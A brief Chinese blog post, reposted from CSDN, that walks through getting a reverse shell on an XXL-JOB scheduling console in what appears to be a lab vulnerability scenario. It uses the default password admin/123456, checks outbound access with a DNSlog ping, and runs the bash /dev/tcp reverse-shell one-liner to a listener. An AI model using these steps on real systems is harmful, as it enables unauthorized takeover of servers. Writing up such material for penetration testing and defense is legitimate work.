0


XXL-JOB 任务调度中心 后台反弹getshell

访问漏洞场景,使用弱口令admin/123456,进入后台

在任务管理处新增

运行模式一定要选shell模式,其他的地方随便填

保存之后点击操作

选择GLUE IDE,我们可以通过DNSlog判断一下

ping xxxxx.dnslog.cn

然后我们保存,然后执行一次

刷新之后,出现下图情况,证明设备出网

DNSLog Platform

那我们就可以更改 GLUE IDE中的命令了,将shell反弹到我们监听的设备

/bin/bash -i >& /dev/tcp/监听IP/5555 0>&1

监听IP先进行监听,然后按照测试是否出网的时候执行一次,就将shell反弹到监听设备上了

标签: 安全 web安全

本文转载自: https://blog.csdn.net/m0_49025459/article/details/129528484
版权归原作者 仲瑿 所有, 如有侵权,请联系我们删除。

“XXL-JOB 任务调度中心 后台反弹getshell”的评论:

还没有评论